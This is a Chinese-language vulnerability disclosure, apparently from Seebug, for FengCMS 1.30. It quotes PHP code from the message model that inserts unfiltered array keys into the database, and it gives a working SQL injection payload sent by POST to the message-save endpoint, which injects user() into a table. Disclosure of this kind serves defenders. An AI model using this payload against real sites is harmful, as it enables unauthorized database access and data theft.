### 简要描述:
http://www.fengcms.com/
最新版本1.30
### 详细说明:
app\model\messageModel.php
```
public function save($array){
if($_SESSION['authnum']!=$array['vcode']||$_SESSION['authnum']==""){ return array('status' => 'c');exit;}
unset($array['vcode']);
$re=D($this->d_name)->insert($array);
if($re){
$_SESSION['authnum']="";
return array('status' => 'y','id' => $re);
}else{
return array('status' => 'n','id' => $re);
}
```
$re=D($this->d_name)->insert($array);
未对数组key过滤。
反引号无视转义。
pyload:
POST /?controller=message&operate=save
title`,`name`,`qq`,`tel`,`mail`,`content`,`time`)values(user(),qq,qq,qq,qq,qq,1426038685);#insert/**/into/**/`f_message`/**/(`title=testsql&name=&qq=&tel=&mail=&content=aaaaaaaaaaaa&vcode=vzyd&time=1426039319
### 漏洞证明:
[<img src="https://images.seebug.org/upload/201503/11103743036c89090cbbb5d4b50e5c656a0b0210.png" alt="fengcms#1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201503/11103743036c89090cbbb5d4b50e5c656a0b0210.png)
[<img src="https://images.seebug.org/upload/201503/111039099e181f84a5a3442bdcf4ac15accc0562.png" alt="fengcms#2.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201503/111039099e181f84a5a3442bdcf4ac15accc0562.png)
[<img src="https://images.seebug.org/upload/201503/11103923e543e4202ed88bbf973ce7be99002606.png" alt="fengcms3.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201503/11103923e543e4202ed88bbf973ce7be99002606.png)
京公网安备 11010502034610号
暂无评论